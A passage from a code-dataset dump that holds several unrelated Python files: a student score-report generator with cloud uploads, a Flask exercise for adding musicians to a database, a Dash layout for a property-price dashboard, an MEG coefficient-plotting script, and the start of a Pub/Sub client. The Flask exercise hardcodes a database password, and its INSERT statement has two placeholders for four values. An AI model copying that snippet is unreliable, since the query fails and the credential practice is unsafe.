')\n\n '''\n Post-Construction JS\n '''\n # For Table:\n script(src='styles/js/table_formatter.js')\n\n write_html(doc, outpath)\n\n def write_coversheet(self, report_context):\n\n student = report_context['student']\n if self.debug:\n pickle_save(f\"{self.data_path}/debug/{self.TEST_NAME}/{student}_context.pickle\", report_context)\n\n test_name = report_context['test_name']\n fname = f'{student}_{test_name}_COVERSHEET'.upper() + '.html'\n\n report_path = os.path.join(report_context['test_outdir'], student)\n\n outpath = os.path.join(report_path, fname)\n\n doc = dominate.document(title=fname)\n\n with doc.head:\n link(rel='stylesheet', href='styles/css/bootstrap.css')\n link(rel='stylesheet', href=\"styles/css/report_styles.css\")\n raw('''\n \n ''')\n\n with doc.body:\n with div(_class='container'):\n div(_class='row', style='height: 2em')\n # Header Image:\n with div(_class='row', style='height: 15em'):\n with div(_class='col-12 text-center'):\n img(src='REDACTED',\n _class='img-fluid', style='height: 15em')\n with div(_class='row', style=\"text-align: center\"):\n div('REDACTED', _class='col',\n style=\"display: inline-block; width: 100%\")\n\n with div(_class='row'):\n with div(_class='col align-self-center'):\n h3(f'{self.TEST_NAME} Score Sheet')\n p(strong('NAME:'), f' {student}', style='font-size: 2em')\n # p(f'Test Edition: {}')\n p(strong('CLASS/TUTOR:'),\n f' {report_context.get(\"teacher_name\")}',\n style='font-size: 2em')\n\n with table(_class='table'):\n thead(tr([th('')] + [th(strong(section), scope='col') for section in\n report_context['sections']]))\n with tr(scope='row', style={'text-align': 'center'}):\n td(strong('Correct:'))\n for section in report_context['sections']:\n section_data = report_context[section]\n td(f'{section_data[\"n_correct\"]}/{section_data[\"n_total\"]}')\n\n with div(_class='row jumbotron'):\n scores = report_context['scores']\n if self.debug:\n pickle_save(\n os.path.join(self.data_path, f'debug/{self.TEST_NAME}/{student}_score_conversions.pickle'),\n scores)\n with table(_class='table'):\n thead(tr([th('')] + [strong(th(section.upper(), scope='col')) for section, _ in scores]))\n with tr(scope='row', style={'text-align': 'center'}):\n td(strong('Scaled:'))\n for _, score in scores:\n td(f'{score}')\n\n write_html(doc, outpath)\n\n def merge_and_upload_reports(self, test_output_path, all_report_contexts):\n '''\n Make a post to the db app! \n '''\n if not self.no_upload_db:\n print_conditional('Uploading to DB app:', self.log)\n for report_context in all_report_contexts:\n upload_to_db(report_context, self.NAME_ID_MAP, self.test_meta_info)\n else:\n print_conditional('Skipping REDACTED Mongo upload (DEBUG)', self.log)\n\n test_dir = test_output_path\n\n student_names = [n for n in os.listdir(test_dir) if not n.startswith('.')]\n\n if not self.skip_merge:\n for student in student_names:\n print_conditional(f'Converting: {student.upper()}', self.log)\n test_name = self.TEST_NAME\n merged_pdf_fname = f'{student}_{test_name}_MERGED'.upper() + '.pdf'\n outdir = os.path.join(test_output_path, student)\n\n '''\n Get list of all files to merge:\n '''\n html_files = []\n for path, dirs, files in os.walk(outdir):\n for f in files:\n if '.html' in f:\n fpath = os.path.join(path, f)\n if 'COVERSHEET' in f:\n html_files.insert(0, fpath)\n else:\n html_files.append(os.path.join(path, f))\n\n print_conditional('Converting Reports to PDF:', self.log)\n watermark_path = os.path.join(self.resource_path, 'base/imgs/watermark.pdf')\n pdf_paths = [html_to_pdf(f, watermark_path) for f in tqdm(html_files)]\n\n '''\n Sort PDF paths by breakdown section order (self.test_order):\n '''\n # get coversheet\n cover = [pdf_paths[0]]\n # get non-coversheet\n non_cover = pdf_paths[1:]\n # sort (in place) by matching sections within pdf filenames\n non_cover.sort(\n key=lambda x:\n [idx for idx, section in enumerate(self.test_order) if f'_{section.upper()}_REPORT' in x][0])\n # list concatenate, and overwrite the old pdf_paths order:\n pdf_paths = cover + non_cover\n\n print_conditional('Merging:', self.log)\n merged_pdf_dest = os.path.join(outdir, merged_pdf_fname)\n merge_pdfs(pdf_paths, out_fname=merged_pdf_dest)\n\n '''\n Upload the merged pdf to AWS bucket:\n '''\n student_id = None\n if not self.no_upload_aws:\n student_id = self.NAME_ID_MAP[student]\n s3_dest = f'REDACTED'\n retry(upload_to_s3, 5, merged_pdf_dest, s3_dest)\n if not self.no_upload_gcp:\n gcp_dest = f'REDACTED'\n retry(upload_blob, 5, self.resource_path,\n 'REDACTED', merged_pdf_dest, gcp_dest)\n\n '''\n NOTIFY the student:\n '''\n # Will notify if not told to skip.\n # Will also NOT notify a student if their student_id can't be located.\n if (not self.skip_notifications):\n if not student_id:\n Alert(\n f\"Can't find student id {student_id} - either you're in debug mode and using a fake student, or there's something wrong with our student id database.\",\n title='Student ID Missing')\n else:\n base_url = 'REDACTED'\n api = 'REDACTED'\n url = os.path.join(base_url, api)\n request_body = {'gradecam_id': student_id,\n 'report_type': self.TEST_NAME}\n print_conditional('Notifying:', self.log)\n print_conditional(request_body, self.log)\n resp = retry(requests.post, 5, url, data=request_body)\n if resp.status_code != 200:\n print_conditional(f'Error notifying {student_id} at {url}', self.log)\n else:\n print_conditional('Skipping Notification step!', self.log)\n\n '''\n Delete all but the merged output\n '''\n if self.delete_non_merged:\n out_contents = os.listdir(outdir)\n for f in out_contents:\n path = os.path.join(outdir, f)\n if os.path.isfile(path):\n if '_MERGED.' not in path:\n os.remove(path)\n\n print_conditional(f'Report published to {merged_pdf_dest}!', self.log)\n else:\n print_conditional('Skipping report merge process (DEBUG).', self.log)\n\n '''\n Update S3 name-id map with local mappings.\n '''\n if not self.skip_name_mapping_step:\n print_conditional('Updating name-id records on S3...', self.log)\n retry(download_from_s3, 5, 'REDACTED', 'REDACTED')\n with open('REDACTED', 'r') as jf:\n remote_name_id_map = json.loads(jf.read())\n\n # Remove old version\n os.remove('REDACTED')\n # Update in memory\n remote_name_id_map.update(self.NAME_ID_MAP)\n\n # Write out as new (updated) version\n with open('REDACTED', 'w') as jf_out:\n jf_out.write(json.dumps(remote_name_id_map))\n\n # Finally, upload updated version\n # TO S3\n retry(upload_to_s3, 5, 'REDACTED', 'REDACTED')\n # TO GCP\n if not self.no_upload_gcp:\n retry(upload_blob, 5, self.resource_path,\n 'REDACTED', 'REDACTED', 'REDACTED')\n os.remove('REDACTED')\n else:\n print_conditional('Skipping name map step (DEBUG).', self.log)\n\n '''\n When all is finished:\n '''\n if not self.mem.get('aws_configured'):\n print_conditional('AWS not configured on this computer', self.log)\n if 'mgb' in os.environ['HOME']:\n print_conditional('Configuring as REDACTED', self.log)\n retry(aws_login, 5, os.path.abspath(self.resource_path), as_root=True)\n else:\n print_conditional('Configuring as REDACTED', self.log)\n retry(aws_login, 5, os.path.abspath(self.resource_path))\n self.mem['aws_configured'] = True\n self.save_mem()\n if not self.no_upload_aws:\n print_conditional('Uploading Files to AWS - Do Not Close Any Windows.', self.log)\n retry(update_test_archives_to_aws, 5, self.chosen_files, self.TEST_NAME)\n else:\n print_conditional('Skipping AWS archive upload (DEBUG).', self.log)\n","repo_name":"mgbvox/rg-public","sub_path":"ibid_reportgen/src/app/reportgen.py","file_name":"reportgen.py","file_ext":"py","file_size_in_byte":37545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7183472366","text":"from flask import Flask, request\nfrom psycopg2 import connect, OperationalError\n\napp = Flask(__name__)\n\nFORM = \"\"\"\n\n\n\n \n\n\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n \n
\n
\n\n\n\"\"\"\n\n\ndef add_musician(cur, name, surname, instrument, city):\n sql = \"INSERT INTO Musicians(name, surname, instrument, city) VALUES(%s, %s);\"\n values = (name, surname, instrument, city)\n cur.execute(sql, values)\n\n\n@app.route(\"/new_musician\", methods=(\"GET\", \"POST\"))\ndef new_musician():\n if request.method == \"GET\":\n return FORM\n else:\n name = request.form.get(\"name\")\n surname = request.form.get(\"surname\")\n instrument = request.form.get(\"instrument\")\n city = request.form.get(\"city\")\n\n if not name or not surname or not instrument or not city:\n return \"Invalid data!\"\n\n try:\n connection = connect(database=\"exam_db\", user=\"postgres\", password=\"coderslab\", host=\"localhost\")\n connection.autocommit = True\n cursor = connection.cursor()\n add_musician(cursor, name, surname, instrument, city)\n connection.close()\n return \"New musician has been successfully added.\"\n except OperationalError as error:\n return error\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"MicJoz/Learning-Python-from-scratch","sub_path":"Python Developer Bootcamp/Advanced Python and Databases/Test retake/Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38989889794","text":"from datetime import datetime\nimport os\nimport base64\n\nimport dash_bootstrap_components as dbc\nfrom dash import dcc\nfrom dash import html\n\nfrom server_config import application\n\n#### CSS Theme Variables ####\nsetting = \"dark\"\n\nif setting == \"light\":\n nav_bar_css = \"navbar navbar-expand-lg navbar-light bg-primary\"\n summary_cards_css = \"card text-white bg-secondary mb-3\"\nelse:\n nav_bar_css = \"navbar navbar-expand-lg navbar-dark bg-dark\"\n div_main_css = \"card text-white bg-primary mb-3\"\n summary_cards_css = \"card text-white bg-success mb-3\"\n\n#### Setting the variables #####\n\n# List for charts\nchart = [\"Line Chart\", \"Violin Chart\", \"Bar Chart\"]\ngraphs = [\"Total Value\", \"Average Price\", \"Volume of Sales\"]\ncharts = []\nfor i in chart:\n if i != \"Violin Chart\":\n for j in graphs:\n charts.append(\"{} - {}\".format(i, j))\n else:\n charts.append(\"Violin Chart - Price\")\n\n\n#### Navbar Simple ####\nnavbar_simple = dbc.NavbarSimple(\n children=[\n dbc.DropdownMenu(\n nav=True,\n in_navbar=True,\n label=\"Menu\",\n children=[\n # dbc.DropdownMenuItem(\"GitHub\", href=\"https://github.com/emmc15\"),\n # dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\"Support this website\", href=\"https://www.buymeacoffee.com/propeiredb\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\n \"Property Register Site\",\n href=\"https://propertypriceregister.ie/website/npsra/pprweb.nsf/PPR?OpenForm\",\n ),\n # dbc.DropdownMenuItem(divider=True),\n # dbc.DropdownMenuItem(\"CSS Theme\", href=\"https://bootswatch.com/flatly/\"),\n ],\n )\n ],\n brand=\"PropEireDB\",\n sticky=\"top\",\n className=nav_bar_css,\n id=\"nav-bar\",\n)\n# make dropdown for the link referneces in the page\ndropdown = dbc.DropdownMenu(\n children=[\n # NOTE: target parameter opens link in new tab rather than override this\n dbc.DropdownMenuItem(\"Buy Me a Coffee\", href=\"https://www.buymeacoffee.com/propeiredb\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\n \"Property Register Site\", href=\"https://propertypriceregister.ie/website/npsra/pprweb.nsf/PPR?OpenForm\"\n ),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\"Contact Us\", href=\"mailto:admin@propeiredb.ie\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\"T&Cs of PRSA Data Used\", href=\"http://psr.ie/en/PSRA/Pages/Re-Use_of_Information\"),\n ],\n nav=True,\n in_navbar=True,\n label=\"Menu\",\n size=\"sm\",\n right=True,\n)\n\n\n#### Navbar Complex ####\n# Base Navbar insert layout\nbase_navbar = dbc.Container(\n [\n # Sets the branding and the title\n dbc.Row(\n [\n # Imports the logo to the navbar NOTE: app.get_asset_url() searches for asset folder in python and pulls in the png image\n dbc.Col(html.Img(src=application.get_asset_url(\"white-home-6-point-see-through.png\"), height=\"40px\")),\n dbc.Col(dbc.NavbarBrand(\"PropEireDB\")),\n ],\n align=\"left\",\n ),\n # Sets the navbar to be collapsible for mobile view ie. menu dropdown on mobile\n dbc.NavbarToggler(id=\"navbar-toggler\"),\n # Adds in the dropdown for the collapse on mobile\n dbc.Collapse(\n dbc.Nav([dropdown], className=nav_bar_css, navbar=True, horizontal=\"end\"), id=\"navbar-collapse\", navbar=True\n ),\n ]\n)\n\n# Final creation of the nav bar\nnavbar_complex = dbc.Navbar(base_navbar, id=\"nav-bar\", className=nav_bar_css, color=\"green\")\n\n\n#### Region Selection #####\n\n# Region Choice\nregion_choice = html.Div(\n [\n html.H6(\"Select Map Type\"),\n dcc.Dropdown(\n id=\"region-dropdown\",\n options=[\n {\"label\": \"Province\", \"value\": \"Province\"},\n {\"label\": \"County\", \"value\": \"County\"},\n {\"label\": \"Dublin Area\", \"value\": \"Dublin Area\"},\n {\"label\": \"Dublin Scatter Map\", \"value\": \"Dublin Clustering\"},\n ],\n value=\"Province\",\n style={\"width\": \"75%\", \"display\": \"inline-block\"}\n # inputStyle={\"margin-right\": \"2px\", \"margin-left\": \"5px\"},\n # labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n ),\n ],\n style={\"margin-left\": \"50px\"},\n)\n\n#### Area Choice ####\n# This selects the area based on the region choice selection\narea_choice = html.Div(\n [\n # Area Choice Dropdown\n html.H3(),\n html.H6(\"Select Areas\"),\n dcc.Dropdown(id=\"region-choice-dropdown\", multi=True, style={\"width\": \"75%\", \"display\": \"inline-block\"}),\n ],\n style={\"margin-left\": \"50px\"},\n)\n\n#### Invert Area Selection ####\ninvert_choice = html.Div(\n [\n dcc.Checklist(\n id=\"invert-region-choice\",\n options=[{\"label\": \"Invert Selection\", \"value\": True}],\n inputStyle={\"margin-right\": \"2px\", \"margin-left\": \"5px\"},\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n )\n ]\n)\n\n##### Year Slider ####\n# Select the year via slider\nyear_slider = html.Div(\n [\n html.H6(\"Year Slider\"),\n dcc.Dropdown(id=\"year-choice-dropdown\", multi=True, options=[str(i) for i in range(2010, 2023)], value=\"2022\"),\n ],\n style={\"margin-left\": \"50px\", \"margin-right\": \"50px\", \"margin-bottom\": \"50px\"},\n)\n\n#### Period Slider ####\n\n# Select the periods via slider\nperiod_slider = html.Div(\n [\n html.H6(\"Month Slider\"),\n dcc.RangeSlider(\n id=\"time-of-year-choice-dropdown\",\n min=0,\n max=11,\n step=None,\n marks={\n 0: \"Jan\",\n 1: \"Feb\",\n 2: \"Mar\",\n 3: \"Apr\",\n 4: \"May\",\n 5: \"Jun\",\n 6: \"Jul\",\n 7: \"Aug\",\n 8: \"Sep\",\n 9: \"Oct\",\n 10: \"Nov\",\n 11: \"Dec\",\n },\n value=[0, 11],\n ),\n ],\n style={\"margin-left\": \"50px\", \"margin-right\": \"50px\", \"margin-bottom\": \"50px\"},\n)\n\n\ndate_picker = dcc.DatePickerRange(\n id=\"date-range\",\n start_date_placeholder_text=\"Start Period\",\n end_date_placeholder_text=\"End Period\",\n calendar_orientation=\"vertical\",\n start_date=datetime(2010, 1, 1),\n end_date=datetime.today(),\n)\n\ndate_picker = html.Div(\n [html.H6(\"Date Range\"), date_picker], style={\"margin-left\": \"50px\", \"margin-right\": \"50px\", \"margin-bottom\": \"50px\"}\n)\n\n#### Update Map Button ####\n\n# Button Div\nupdate_button = html.Div(\n [\n # Adds the button for updating the map\n html.Button(id=\"graph-button\", n_clicks=0, children=\"Update Map\", className=\"btn btn-outline-success\")\n ],\n style={\"width\": \"100%\", \"display\": \"flex\", \"align-items\": \"center\", \"justify-content\": \"center\"},\n)\n\n#### Input Area ####\n\n# Formats the html in single div with breaks between inputs\ninput_column = html.Div(\n [\n region_choice,\n html.Br(),\n area_choice,\n invert_choice,\n html.Br(),\n date_picker,\n # html.Br(),\n # year_slider,\n # html.Br(),\n # period_slider,\n # update_button,\n html.Br(),\n ]\n)\n\n# Converts to column and sets the widths for reformatting on different screens\n# input_column = dbc.Col([input_column], width=2, md=2, lg=2, xl=2, sm=12, xs=12)\n\n#### Map Column ####\n# Map Column\n# map_column=dbc.Col(\n# #Loading component to show user map is loading in long wait times\n# dcc.Loading(id='map-loading',\n# children=[dcc.Graph(id='mapbox', style={\"width\": \"75%\", 'height':'100%', \"display\": \"inline-block\"})],\n# type='cirlce',\n# color='#18BC9C'),\n# width=6, md=6, lg=6,xl=6,sm=12,xs=12\n# )\n\n# Used below instead as issue with loading object and hover data\n# NOTE: https://community.plot.ly/t/choroplethmapbox-hover-problem/33218\nnew_map_column = dbc.Col(\n # Loading component to show user map is loading in long wait times\n html.Div(\n [\n dcc.Graph(id=\"mapbox\", style={\"width\": \"100%\", \"height\": \"800px\", \"display\": \"inline-block\"}),\n ],\n style={\"margin-left\": \"30px\"},\n ),\n width=8,\n md=12,\n lg=8,\n xl=8,\n sm=12,\n xs=12,\n)\n\n\n#### Stacked High Level metrics ####\n# Stacked Values\nstacked_values = dbc.Col(\n [\n # Total Value\n html.Div(\n [\n html.H6(\"Total Value\", style={\"text-align\": \"center\"}),\n html.H4(id=\"total-value\", className=\"info-text\", style={\"text-align\": \"center\"}),\n ],\n id=\"total\",\n className=summary_cards_css,\n ),\n # Number of Sales\n html.Div(\n [\n html.H6(\"No. of Sales\", style={\"text-align\": \"center\"}),\n html.H4(id=\"volume-value\", className=\"info-text\", style={\"text-align\": \"center\"}),\n ],\n id=\"count\",\n className=summary_cards_css,\n ),\n # Average Price\n html.Div(\n [\n html.H6(\"Average Price\", style={\"text-align\": \"center\"}),\n html.H4(id=\"avg-value\", className=\"info-text\", style={\"text-align\": \"center\"}),\n ],\n id=\"avg\",\n className=summary_cards_css,\n ),\n # Pie Chart\n html.Div([dcc.Graph(id=\"pie-chart\", style={\"width\": \"100%\", \"height\": \"200px\", \"display\": \"inline-block\"})]),\n # Inputs\n html.Div([input_column]),\n ],\n width=3,\n md=12,\n lg=3,\n xl=3,\n sm=12,\n xs=12,\n)\n\n#### First Row ####\nannoying_alert = dbc.Alert(\n \"Data shown has missing entries and inaccuarcies, to help improve the system and keep it up to date and free from ads, please consider donating at https://www.buymeacoffee.com/propeiredb\",\n id=\"warning-alert\",\n dismissable=True,\n is_open=False,\n fade=True,\n class_name=\"alert alert-dismissable alert-danger\",\n)\nfirst_row = html.Div([annoying_alert, html.Br(), dbc.Row([new_map_column, stacked_values], justify=\"center\")])\n\n#### First Graph Area ####\n# top left graph and dropdown\nfirst_graph = dbc.Col(\n [\n # Sets the dropdown for the selection of what type of graph\n dcc.Dropdown(\n id=\"left-chart-dropdown\",\n options=[{\"label\": k, \"value\": k} for k in charts],\n value=\"Bar Chart - Total Value\",\n style={\"width\": \"75%\", \"display\": \"inline-block\", \"margin-left\": \"25px\"},\n ),\n # Optional radio buttons to allow greater choice graphing potential\n dcc.RadioItems(\n id=\"left-checkbox\",\n options=[\n {\"label\": \" Grouped by year \", \"value\": \"year\"},\n {\"label\": \" Grouped by period \", \"value\": \"period\"},\n {\"label\": \" Grouped by Area \", \"value\": \"area\"},\n ],\n value=\"area\",\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n inputStyle={\"margin-right\": \"1px\", \"margin-left\": \"5px\"},\n ),\n # Graph layout object\n dcc.Graph(id=\"left-chart\", style={\"width\": \"100%\", \"height\": \"300px\", \"display\": \"inline-block\"}),\n ],\n width={\"size\": 6},\n md=6,\n lg=6,\n xl=6,\n sm=12,\n xs=12,\n)\n\n#### Second Graph Area #####\nsecond_graph = dbc.Col(\n [\n dcc.Dropdown(\n id=\"right-chart-dropdown\",\n options=[{\"label\": k, \"value\": k} for k in charts],\n value=\"Bar Chart - Volume of Sales\",\n style={\"width\": \"75%\", \"display\": \"inline-block\", \"margin-left\": \"25px\"},\n ),\n dcc.RadioItems(\n id=\"right-checkbox\",\n options=[\n {\"label\": \" Grouped by year \", \"value\": \"year\"},\n {\"label\": \" Grouped by period \", \"value\": \"period\"},\n {\"label\": \" Grouped by Area \", \"value\": \"area\"},\n ],\n value=\"area\",\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n inputStyle={\"margin-right\": \"1px\", \"margin-left\": \"5px\"},\n ),\n dcc.Graph(id=\"right-chart\", style={\"width\": \"100%\", \"height\": \"300px\", \"display\": \"inline-block\"}),\n ],\n width={\"size\": 6},\n md=6,\n lg=6,\n xl=6,\n sm=12,\n xs=12,\n)\n\n#### Second Row ####\nsecond_row = html.Div([dbc.Row([first_graph, second_graph], justify=\"around\")])\n\n#### Bottom Graph ####\nbottom_graph = dbc.Col(\n [\n # Dropdown for choicing the graph\n dcc.Dropdown(\n id=\"chart-dropdown\",\n options=[{\"label\": k, \"value\": k} for k in charts],\n value=\"Line Chart - Total Value\",\n style={\"width\": \"75%\", \"display\": \"inline-block\", \"margin-left\": \"25px\"},\n ),\n # Hidden radio items to extend out the functionality of specific graphs\n dcc.RadioItems(\n id=\"series-checkbox\",\n options=[\n {\"label\": \" Grouped by year \", \"value\": \"year\"},\n {\"label\": \" Grouped by period \", \"value\": \"period\"},\n {\"label\": \" Grouped by Area \", \"value\": \"area\"},\n ],\n value=\"area\",\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n inputStyle={\"margin-right\": \"1px\", \"margin-left\": \"5px\"},\n ),\n # graphing object\n dcc.Graph(id=\"series-chart\", style={\"width\": \"100%\", \"height\": \"300px\", \"display\": \"inline-block\"}),\n ]\n)\n\n#### Third Row ####\nthird_row = html.Div([html.Br(), dbc.Row([bottom_graph])])\n\n# -----------------------------------------------------------------------------\n# Layout Config\n# -----------------------------------------------------------------------------\n\n# buymeacoffee footer\nimage_filename = \"bmc-full-logo-no-background.png\"\nimage_filepath = os.path.join(os.getcwd(), \"assets\", image_filename)\nwith open(image_filepath, \"rb\") as img:\n encoded_image = base64.b64encode(img.read())\n\nbuymeacoffee_image = html.A(\n [html.Img(src=\"data:image/png;base64,{}\".format(encoded_image.decode()), height=100, width=200)],\n href=\"https://www.buymeacoffee.com/propeiredb\",\n style={\"display\": \"inline-block\"},\n)\n\nmail_to_footer = html.A(\"Contact Us at admin@propeiredb.ie\", href=\"mailto:admin@propeiredb.ie\")\nuse_of_data = html.A(\"T&Cs of PRSA Data Used\", href=\"http://psr.ie/en/PSRA/Pages/Re-Use_of_Information\")\nbuymeacoffee_image = dbc.Container(\n dbc.Row(\n [\n dbc.Col(\n [html.Br(), buymeacoffee_image, html.Br(), mail_to_footer, html.Br(), use_of_data],\n width=3,\n md=3,\n lg=3,\n xl=3,\n sm=12,\n xs=12,\n )\n ],\n align=\"center\",\n justify=\"center\",\n ),\n)\n\n#### Cached Div ####\ngeojson_div = html.Div(id=\"cached-geojson\", style={\"display\": \"none\"})\ninputs_div = html.Div(id=\"cached-inputs\", style={\"display\": \"none\"})\n\n\n#### Layout ####\nnavbar = navbar_complex\nfooter = html.Div([html.Br(), buymeacoffee_image])\nlayout = html.Div(\n [\n navbar,\n first_row,\n second_row,\n third_row,\n footer,\n geojson_div,\n inputs_div,\n dcc.Store(id=\"track-annoying-alert\", storage_type=\"memory\"),\n ]\n)\n\n#### Insert into Server ####\napplication.layout = layout # Assigns the layout\napplication.title = \"PropEireDB\"\n","repo_name":"emmc15/PropEireDb","sub_path":"src/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":15517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"27549002297","text":"import argparse\nimport load_data_ordered as load_data\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.io as sio\nimport run_TGM_LOSO\nimport os\n\n\nSENSOR_MAP = '/bigbrain/bigbrain.usr1/homes/nrafidi/MATLAB/groupRepo/shared/megVis/sensormap.mat'\n\n\ndef sort_sensors():\n load_var = sio.loadmat(SENSOR_MAP)\n sensor_reg = load_var['sensor_reg']\n sensor_reg = [str(sens[0][0]) for sens in sensor_reg]\n sorted_inds = np.argsort(sensor_reg)\n sorted_reg = [sensor_reg[ind] for ind in sorted_inds]\n return sorted_inds, sorted_reg\n\n\ndef intersect_coef(exp,\n sen_type,\n word,\n win_time,\n win_len=100,\n overlap=12,\n adj=None,\n num_instances=1,\n avgTime='F',\n avgTest='F'):\n top_dir = run_TGM_LOSO.TOP_DIR.format(exp=exp)\n\n if exp == 'krns2':\n rep = 10\n else:\n rep = None\n coef_by_sub = []\n for sub in load_data.VALID_SUBS[exp]:\n save_dir = run_TGM_LOSO.SAVE_DIR.format(top_dir=top_dir, sub=sub)\n result_fname = run_TGM_LOSO.SAVE_FILE.format(dir=save_dir,\n sub=sub,\n sen_type=sen_type,\n word=word,\n win_len=win_len,\n ov=overlap,\n perm='F',\n alg='lr-l1',\n adj=adj,\n avgTm=avgTime,\n avgTst=avgTest,\n inst=num_instances,\n rep=rep,\n rsP=1,\n mode='coef') + '.npz'\n if not os.path.isfile(result_fname):\n continue\n result = np.load(result_fname)\n coef = result['coef']\n Cs = result['Cs']\n coef_time = np.array(coef[win_time] != 0)\n C_time = np.array(Cs[win_time])\n print(sub)\n print(C_time)\n print(np.sum(coef_time))\n if sub == 'B' or sub == 'A' or sub == 'K':\n fig, ax = plt.subplots()\n meow = np.squeeze(np.sum(coef_time, axis=0))\n h = ax.imshow(np.reshape(meow, (306, -1)), interpolation='nearest', aspect='auto', vmin=0.0, vmax=coef_time.shape[0])\n ax.set_title('number nonzero coef sum over classes\\n{}'.format(sub))\n fig.colorbar(h, ax=ax)\n coef_time = np.all(coef_time, axis=0)\n\n coef_by_sub.append(coef_time[None, ...])\n intersection = np.mean(np.concatenate(coef_by_sub, axis=0), axis=0)\n return intersection\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--experiment')\n parser.add_argument('--sen_type', choices=run_TGM_LOSO.VALID_SEN_TYPE)\n parser.add_argument('--word', choices = ['noun1', 'verb', 'noun2'])\n parser.add_argument('--win_time', type=int)\n parser.add_argument('--win_len', type=int, default=100)\n parser.add_argument('--overlap', type=int, default=12)\n parser.add_argument('--adj', default='None', choices=['None', 'mean_center', 'zscore'])\n parser.add_argument('--num_instances', type=int, default=2)\n parser.add_argument('--avgTime', default='F')\n parser.add_argument('--avgTest', default='F')\n args = parser.parse_args()\n\n intersection = intersect_coef(args.experiment,\n args.sen_type,\n args.word,\n args.win_time,\n win_len=args.win_len,\n overlap=args.overlap,\n adj=args.adj,\n num_instances=args.num_instances,\n avgTime=args.avgTime,\n avgTest=args.avgTest)\n\n if args.avgTime == 'T':\n reshape_dim = 1\n else:\n reshape_dim = args.win_len\n intersection = np.reshape(intersection, (306, reshape_dim))\n\n sorted_inds, sorted_reg = sort_sensors()\n uni_reg = np.unique(sorted_reg)\n yticks_sens = [sorted_reg.index(reg) for reg in uni_reg]\n\n intersection = intersection[sorted_inds, :]\n\n fig, ax = plt.subplots()\n h = ax.imshow(intersection, interpolation='nearest', aspect='auto', vmin=0.5, vmax=1)\n ax.set_yticks(yticks_sens)\n ax.set_yticklabels(uni_reg)\n ax.set_ylabel('Sensors')\n if reshape_dim > 1:\n time_win = np.array(range(args.win_len))\n time = time_win*2\n ax.set_xticks(time_win[::25])\n ax.set_xticklabels(time[::25])\n ax.set_xlabel('Time (ms)')\n ax.set_title('Fraction of subjects at time window {win_time}\\n{sen_type} {word} {experiment}\\n{win_len}ms {overlap}ms {num_instances} inst'.format(win_time=args.win_time,\n sen_type=args.sen_type,\n word=args.word,\n experiment=args.experiment,\n win_len=args.win_len*2,\n overlap=args.overlap,\n num_instances=args.num_instances))\n plt.colorbar(h)\n fig.tight_layout()\n plt.savefig(\n '/home/nrafidi/thesis_figs/{exp}_coef_intersect_{sen_type}_{word}_{win_time}_win{win_len}_ov{overlap}_ni{num_instances}_avgTime{avgTime}.png'.format(\n exp=args.experiment, sen_type=args.sen_type, word=args.word, avgTime=args.avgTime, win_time=args.win_time, win_len=args.win_len,\n overlap=args.overlap,\n num_instances=args.num_instances\n ), bbox_inches='tight')\n plt.show()\n\n\n","repo_name":"nrafidi/thesis-code","sub_path":"python/lr-l1_coef_intersect.py","file_name":"lr-l1_coef_intersect.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"20209044094","text":"from collections import OrderedDict\nfrom distutils import util\nimport os\nimport re\nfrom typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union\nimport pkg_resources\n\nfrom google.api_core import client_options as client_options_lib # type: ignore\nfrom google.api_core import exceptions # type: ignore\nfrom google.api_core import gapic_v1 # type: ignore\nfrom google.api_core import retry as retries # type: ignore\nfrom google.auth import credentials # type: ignore\nfrom google.auth.transport import mtls # type: ignore\nfrom google.auth.transport.grpc import SslCredentials # type: ignore\nfrom google.auth.exceptions import MutualTLSChannelError # type: ignore\nfrom google.oauth2 import service_account # type: ignore\n\nfrom google.iam.v1 import iam_policy_pb2 as iam_policy # type: ignore\nfrom google.iam.v1 import policy_pb2 as policy # type: ignore\nfrom google.pubsub_v1.services.schema_service import pagers\nfrom google.pubsub_v1.types import schema\nfrom google.pubsub_v1.types import schema as gp_schema\n\nfrom .transports.base import SchemaServiceTransport, DEFAULT_CLIENT_INFO\nfrom .transports.grpc import SchemaServiceGrpcTransport\nfrom .transports.grpc_asyncio import SchemaServiceGrpcAsyncIOTransport\n\n\nclass SchemaServiceClientMeta(type):\n \"\"\"Metaclass for the SchemaService client.\n\n This provides class-level methods for building and retrieving\n support objects (e.g. transport) without polluting the client instance\n objects.\n \"\"\"\n\n _transport_registry = OrderedDict() # type: Dict[str, Type[SchemaServiceTransport]]\n _transport_registry[\"grpc\"] = SchemaServiceGrpcTransport\n _transport_registry[\"grpc_asyncio\"] = SchemaServiceGrpcAsyncIOTransport\n\n def get_transport_class(cls, label: str = None,) -> Type[SchemaServiceTransport]:\n \"\"\"Return an appropriate transport class.\n\n Args:\n label: The name of the desired transport. If none is\n provided, then the first transport in the registry is used.\n\n Returns:\n The transport class to use.\n \"\"\"\n # If a specific transport is requested, return that one.\n if label:\n return cls._transport_registry[label]\n\n # No transport is requested; return the default (that is, the first one\n # in the dictionary).\n return 